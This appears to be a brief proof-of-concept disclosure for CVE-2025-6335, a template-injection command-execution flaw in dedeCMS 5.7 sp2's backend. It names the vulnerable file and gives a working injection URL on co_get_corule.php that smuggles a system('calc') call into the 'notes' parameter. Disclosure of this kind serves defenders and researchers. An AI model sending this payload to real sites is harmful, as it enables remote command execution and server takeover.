
CVE-2025-6335 の概念実証エクスプロイト。dedeCMS 5.7 sp2 におけるテンプレートインジェクションによるコマンド実行の脆弱性を悪用し、バックエンドインターフェース経由で任意のコマンド実行を可能にします。
BUG_Author: Ewoji
Affected Version: dedeCMS < 5.7.2
Vendor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Vulnerability Files:
/include/dedetag.class.phpAfter install,Log in to the background
Exploiting the Template
Verifying the Exploit:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command